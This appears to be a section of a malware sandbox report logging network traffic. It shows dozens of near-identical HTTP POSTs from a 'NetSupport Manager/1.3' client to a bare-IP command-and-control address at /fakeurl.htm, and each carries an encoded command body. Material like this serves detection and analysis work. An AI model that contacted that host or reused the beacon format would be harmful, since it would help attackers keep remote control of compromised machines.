                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.888062954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:43.988053083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.087934017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.188110113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.295432091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.396075010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.495935917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.596977949 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.696933985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.797240019 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.898036957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:44.999099016 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.098913908 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.199879885 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.303121090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.404071093 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.504889965 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.604897976 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.705929995 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.806972980 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:45.907938004 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.007932901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.108910084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.208971977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.312241077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.412986040 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.512986898 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.614007950 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.817951918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:46.919006109 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.019566059 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.119002104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.219914913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.422007084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.521985054 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.622958899 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.722919941 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.822926998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:47.924006939 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.023910999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.124974012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.225974083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.326981068 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.427050114 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.527890921 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.629003048 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.728899002 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.829895973 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.929976940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.030873060 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.131022930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.231924057 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.334115028 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.436464071 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.657188892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.757162094 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.858876944 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:49.961782932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.061885118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.162336111 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.263008118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.363100052 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.462950945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.564048052 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.665039062 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.766086102 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.866069078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.974832058 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:51.074954987 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:51.175872087 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:51.277143955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
